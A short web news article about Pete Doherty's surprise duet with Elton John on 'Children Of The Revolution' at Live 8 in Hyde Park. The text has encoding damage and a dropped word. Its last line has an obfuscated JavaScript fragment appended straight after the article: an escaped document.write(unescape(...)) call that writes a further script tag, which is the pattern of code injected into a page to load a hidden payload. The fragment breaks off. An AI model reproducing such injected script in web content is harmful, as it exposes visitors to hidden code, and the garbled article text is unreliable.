Pete Doherty sensationally appeared at Live 8 to perform a duet with Elton John (July 2).
One of the oddest musical coming meetings of modern times saw the Babyshambles singer take to the stage to duet with the piano-tinkling legend.
Dressed in an Edwardian military cropped jacket - like those favoured by The Libertines in their early days - and heavy Marc Bolan-style eye make-up, Doherty tripped through a version of the T-Rex classic 'Children Of The Revolution' with Sir Elton.
Introducing the singer, Sir Elton said: “I'd like to introduce a new talentâ€. Walking onstage to rapturous applause, Doherty nothing before launching into the song.
Sir Elton played on the original version of 'Children Of The Revolution' with T-Rex, a version of which featured in the film 'Born To Boogie' - filmed by Ringo Starr.
Rumours started circulating last month that the pair would be performing a duet at Live 8, which is taking place in front of 200,000 people in London's Hyde Park.
Sir Elton reportedly called organisers of the event to personally demand that the Babyshambles singer was put on the bill.
The duet followed an energetic performance from Sir Elton.
Introduced by Little Britain stars David Walliams and Matt Lucas, the legend played a set featuring 'Saturday Night's Alright For Fighting' and 'Bitch Is Back'.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
